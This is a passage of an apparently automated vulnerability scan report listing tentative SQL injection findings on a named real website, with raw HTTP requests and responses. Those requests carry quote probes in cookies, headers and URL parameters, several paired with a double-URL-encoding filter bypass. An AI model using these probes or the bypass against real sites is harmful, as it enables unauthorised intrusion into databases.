Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.153. http://www.analyticspros.com/component/content/article/62-urchin/118-urchin-7-now-available.html [__utmmobile cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/content/article/62-urchin/118-urchin-7-now-available.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /component/content/article/62-urchin/118-urchin-7-now-available.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c'; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:19:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/content/article/62-urchin/118-urchin-7-now-available.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c''; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:19:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:19:03 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:19:03 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27263


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.154. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/content/article/65-ae/110-analytics-engine.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:28:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:28:34 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:28:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29714


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<li>Error. Feed not retrieved.</li>
...[SNIP]...

Request 2

GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)''
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:28:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:28:36 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:28:36 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.155. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/content/article/65-ae/110-analytics-engine.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141%2527; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:18:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141%2527%2527; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:18:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:18:43 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:18:43 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29558


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.156. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html [__utmmobile cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/content/article/65-ae/110-analytics-engine.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:21:51 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:21:52 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:21:53 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29714


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<li>Error. Feed not retrieved.</li>
...[SNIP]...

Request 2

GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:21:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:21:56 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:21:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.157. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html [itemid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/content/article/65-ae/110-analytics-engine.html

Issue detail

The itemid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the itemid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment' HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:13:22 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment'' HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:13:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.158. http://www.analyticspros.com/component/jsetup/comment/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component%2527/jsetup/comment/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:03:23 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component%2527%2527/jsetup/comment/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:03:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:03:25 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 05:03:25 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.159. http://www.analyticspros.com/component/jsetup/comment/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /component/jsetup/comment'/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:24:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:24:04 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:24:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<dt class="error">
...[SNIP]...

Request 2

GET /component/jsetup/comment''/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:24:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:24:06 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:24:06 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.160. http://www.analyticspros.com/component/jsetup/comment/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/jsetup/comment/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
